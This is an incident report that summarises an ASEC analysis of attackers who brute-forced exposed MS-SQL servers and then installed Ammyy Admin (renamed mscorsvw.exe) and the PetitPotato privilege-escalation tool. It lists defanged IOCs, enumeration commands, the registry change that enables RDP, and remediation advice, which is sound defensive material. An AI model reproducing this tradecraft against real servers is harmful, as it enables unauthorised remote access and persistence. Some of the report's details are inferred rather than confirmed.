Full Report
AhnLab SEcurity intelligence Center (ASEC) recently identified cases of attacks installing Ammyy Admin on poorly managed MS-SQL servers. Ammyy Admin is a remote control tool used to control systems remotely along with AnyDesk, ToDesk, TeamViewer, etc. When these tools are used properly, they enable companies and individuals to manage and control systems remotely. However, […]
Analysis Summary
# Incident Report: Installation of Ammyy Admin on Compromised MS-SQL Servers
## Executive Summary
Threat actors targeted poorly managed, publicly exposed MS-SQL servers, exploiting weak credentials to gain initial access. Once inside, the attackers installed the legitimate remote administration tool Ammyy Admin (along with PetitPotato) to establish persistent remote control over the compromised systems, indicating an effort to maintain long-term access for potential data exfiltration or further malicious activity. Response requires immediate remediation of weak credentials and hardening of public-facing database servers.
## Incident Details
- Discovery Date: Not explicitly stated, likely concurrent with ASEC analysis.
- Incident Date: Not explicitly stated, ongoing as reported by ASEC.
- Affected Organization: Various organizations with poorly managed MS-SQL servers (unspecified).
- Sector: Unspecified (Database Servers).
- Geography: Unspecified.
## Timeline of Events
### Initial Access
- Date/Time: Precedes discovery.
- Vector: Exploitation of publicly exposed MS-SQL servers, believed to be using weak credentials (brute force/dictionary attacks).
- Details: Attackers gained initial control over the database server.
### Lateral Movement
- Details: After gaining access, attackers downloaded and executed WGet to stage and install follow-on malware, including Ammyy Admin. Privilege escalation tool PetitPotato was also deployed, suggesting movement toward higher-level system control.
### Data Exfiltration/Impact
- Details: Threat actors executed system information gathering commands (`whoami`, `netstat`, `wmic`). The primary impact was the installation of Ammyy Admin, allowing persistent remote access. They also added a new user and enabled RDP service for alternative remote access.
### Detection & Response
- Details: The incident was primarily identified through analysis conducted by the AhnLab Security intelligence Center (ASEC). Response actions inferred involve remediation of the identified IOCs and underlying configuration weaknesses.
## Attack Methodology
- Initial Access: Weak credentials likely via brute force/dictionary attack on MS-SQL servers.
- Persistence: Installation of Ammyy Admin (disguised as `mscorsvw.exe`) and potential configuration changes via PetitPotato.
- Privilege Escalation: Use of the PetitPotato tool (`p.ax`).
- Defense Evasion: Use of legitimate, trusted software (Ammyy Admin) to mask malicious remote control activity.
- Credential Access: Implied via brute force on MS-SQL service accounts.
- Discovery: Execution of commands like `whoami`, `net user`, `netstat -an`, and `wmic cpu get name,NumberOfCores` to map the environment.
- Lateral Movement: Not explicitly detailed beyond Privilege Escalation, but enabling RDP suggests preparation for broader network access.
- Collection: System configuration and network status gathering.
- Exfiltration: Not explicitly stated, but remote access capability implies intent for exfiltration.
- Impact: Establishment of persistent remote access control.
## Impact Assessment
- Financial: Not specified.
- Data Breach: System information gathered; potential for subsequent data theft via remote access channels.
- Operational: Potential for long-term system compromise and disruption once threat actors utilize full remote control capabilities.
- Reputational: Potentially high, especially if customer data stored on the MS-SQL servers is compromised.
## Indicators of Compromise
- Network Indicators (Defanged):
- hxxp://110.45.186[.]8/
- hxxp://1[.]220.228[.]82/
- File Indicators:
- Ammyy Admin executable (installed as `mscorsvw.exe`)
- Ammyy Admin settings file (`settings3.bin`)
- PetitPotato payload (`p.ax`)
- WGet/downloader component (`get.exe` or similar placeholder)
- Behavioral Indicators:
- Installation of legitimate remote control software (Ammyy Admin v3.10)
- Modification of registry keys to enable RDP (`fDenyTSConnections` set to 0).
- Execution of standard system enumeration commands after initial compromise.
## Response Actions
- Containment: Not explicitly detailed, but immediate steps would involve isolating affected servers and blocking C2 traffic identified by IOCs.
- Eradication: Complete removal of Ammyy Admin, PetitPotato, and associated files; resetting all credentials for the MS-SQL service and potentially all domain accounts if the database server had elevated privileges.
- Recovery: Rebuilding or securely reimaging affected systems; implementing MFA and strong password enforcement.
## Lessons Learned
- Legitimate administration tools (RATs) can easily be weaponized if installed unauthorizedly.
- Poor management, specifically weak or default credentials on public-facing services like MS-SQL, remains a primary entry vector.
- Attackers utilize known vulnerabilities in older software versions (Ammyy Admin v3.10 reportedly has known exploitable configurations).
## Recommendations
- Enforce strong, unique passwords for all database credentials and implement regular rotation policies.
- Do not expose database servers directly to the public internet; utilize firewalls or VPNs for access control.
- Ensure all software, including critical services like MS-SQL and any remote administration tools, are updated to the latest stable versions.
- Regularly audit remote access configurations and user accounts, particularly preventing unauthorized use of privilege escalation tools like PetitPotato.